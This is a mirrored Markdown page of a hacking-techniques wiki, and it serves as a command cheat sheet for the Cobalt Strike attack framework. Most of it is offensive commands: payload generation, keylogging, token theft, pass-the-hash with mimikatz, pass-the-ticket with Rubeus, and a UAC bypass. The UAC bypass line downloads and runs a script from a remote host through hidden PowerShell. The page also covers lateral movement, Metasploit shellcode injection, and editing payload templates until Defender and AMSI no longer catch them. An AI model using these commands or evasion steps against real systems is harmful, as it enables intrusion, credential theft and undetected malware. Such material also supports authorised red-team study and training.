mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-13 23:02:57 +00:00
235 lines
10 KiB
Markdown
235 lines
10 KiB
Markdown
# Cobalt Strike
|
||
|
||
### Listeners
|
||
|
||
### C2 Listeners
|
||
|
||
`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
|
||
|
||
### Peer2Peer Listeners
|
||
|
||
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
|
||
|
||
`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
|
||
|
||
* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
|
||
* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
|
||
|
||
### Generate & Host payloads
|
||
|
||
#### Generate payloads in files
|
||
|
||
`Attacks -> Packages ->` 
|
||
|
||
* **`HTMLApplication`** for HTA files
|
||
* **`MS Office Macro`** for an office document with a macro
|
||
* **`Windows Executable`** for a .exe, .dll orr service .exe
|
||
* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
|
||
|
||
#### Generate & Host payloads
|
||
|
||
`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
|
||
|
||
#### Host Payloads
|
||
|
||
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
|
||
|
||
### Beacon Options
|
||
|
||
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
|
||
execute-assembly </path/to/executable.exe>
|
||
|
||
# Screenshots
|
||
printscreen # Take a single screenshot via PrintScr method
|
||
screenshot # Take a single screenshot
|
||
screenwatch # Take periodic screenshots of desktop
|
||
## Go to View -> Screenshots to see them
|
||
|
||
# keylogger
|
||
keylogger [pid] [x86|x64]
|
||
## View > Keystrokes to see the keys pressed
|
||
|
||
# portscan
|
||
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
|
||
portscan [targets] [ports] [arp|icmp|none] [max connections]
|
||
|
||
# Powershell
|
||
# Import Powershell module
|
||
powershell-import C:\path\to\PowerView.ps1
|
||
powershell <just write powershell cmd here>
|
||
|
||
# User impersonation
|
||
## Token generation with creds
|
||
make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
|
||
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
|
||
rev2self # Stop using token generated with make_token
|
||
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
|
||
|
||
# UAC Bypass
|
||
elevate svc-exe <listener>
|
||
elevate uac-token-duplication <listener>
|
||
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
|
||
|
||
## Steal token from pid
|
||
## Like make_token but stealing the token from a process
|
||
steal_token [pid] # Also, this is useful for network actions, not local actions
|
||
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
|
||
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
|
||
rev2self # Stop using token from steal_token
|
||
|
||
## Launch process with nwe credentials
|
||
spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
|
||
## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
|
||
|
||
## Inject into process
|
||
inject [pid] [x64|x86] [listener]
|
||
## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
|
||
|
||
## Pass the hash
|
||
## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
|
||
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
|
||
pth [DOMAIN\user] [NTLM hash]
|
||
|
||
## Pass the hash through mimikatz
|
||
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
|
||
## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
|
||
steal_token <pid> #Steal token from process created by mimikatz
|
||
|
||
## Pass the ticket
|
||
## Request a ticket
|
||
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
|
||
## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
|
||
make_token <domain>\<username> DummyPass
|
||
## Write the ticket in the attacker machine from a poweshell session & load it
|
||
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
|
||
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
|
||
|
||
## Pass the ticket from SYSTEM
|
||
## Generate a new process with the ticket
|
||
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
|
||
## Steal the token from that process
|
||
steal_token <pid>
|
||
|
||
## Extract ticket + Pass the ticket
|
||
### List tickets
|
||
execute-assembly C:\path\Rubeus.exe triage
|
||
### Dump insteresting ticket by luid
|
||
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
|
||
### Create new logon session, note luid and processid
|
||
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
|
||
### Insert ticket in generate logon session
|
||
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
|
||
### Finally, steal the token from that new process
|
||
steal_token <pid>
|
||
|
||
# Lateral Movement
|
||
## If a token was created it will be used
|
||
jump [method] [target] [listener]
|
||
## Methods:
|
||
## psexec x86 Use a service to run a Service EXE artifact
|
||
## psexec64 x64 Use a service to run a Service EXE artifact
|
||
## psexec_psh x86 Use a service to run a PowerShell one-liner
|
||
## winrm x86 Run a PowerShell script via WinRM
|
||
## winrm64 x64 Run a PowerShell script via WinRM
|
||
|
||
remote-exec [method] [target] [command]
|
||
## Methods:
|
||
<strong>## psexec Remote execute via Service Control Manager
|
||
</strong>## winrm Remote execute via WinRM (PowerShell)
|
||
## wmi Remote execute via WMI
|
||
|
||
## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
|
||
beacon> upload C:\Payloads\beacon-smb.exe
|
||
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
|
||
|
||
|
||
# Pass session to Metasploit - Through listener
|
||
## On metaploit host
|
||
msf6 > use exploit/multi/handler
|
||
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
|
||
msf6 exploit(multi/handler) > set LHOST eth0
|
||
msf6 exploit(multi/handler) > set LPORT 8080
|
||
msf6 exploit(multi/handler) > exploit -j
|
||
|
||
## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
|
||
beacon> spawn metasploit
|
||
## You can only spawn x86 Meterpreter sessions with the foreign listener.
|
||
|
||
# Pass session to Metasploit - Through shellcode injection
|
||
## On metasploit host
|
||
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
|
||
## Run msfvenom and prepare the multi/handler listener
|
||
|
||
## Copy bin file to cobalt strike host
|
||
ps
|
||
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
|
||
|
||
# Pass metasploit session to cobalt strike
|
||
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
|
||
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
|
||
|
||
|
||
# Pivoting
|
||
## Open a socks proxy in the teamserver
|
||
beacon> socks 1080
|
||
|
||
# SSH connection
|
||
beacon> ssh 10.10.17.12:22 username password</code></pre>
|
||
|
||
## Avoiding AVs
|
||
|
||
### Artifact Kit
|
||
|
||
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
|
||
|
||
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
|
||
|
||
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
|
||
|
||
```
|
||
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
|
||
```
|
||
|
||
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
|
||
|
||
### Resource Kit
|
||
|
||
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
|
||
|
||
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
|
||
|
||
```
|
||
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
|
||
```
|
||
|
||
Modifying the detected lines one can generate a template that won't be caught.
|
||
|
||
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
```bash
|
||
cd C:\Tools\neo4j\bin
|
||
neo4j.bat console
|
||
http://localhost:7474/ --> Change password
|
||
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL
|
||
|
||
|
||
|
||
# Change powershell
|
||
C:\Tools\cobaltstrike\ResourceKit
|
||
template.x64.ps1
|
||
# Change $var_code -> $polop
|
||
# $x --> $ar
|
||
cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna
|
||
|
||
#artifact kit
|
||
cd C:\Tools\cobaltstrike\ArtifactKit
|
||
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
|
||
|
||
|
||
```
|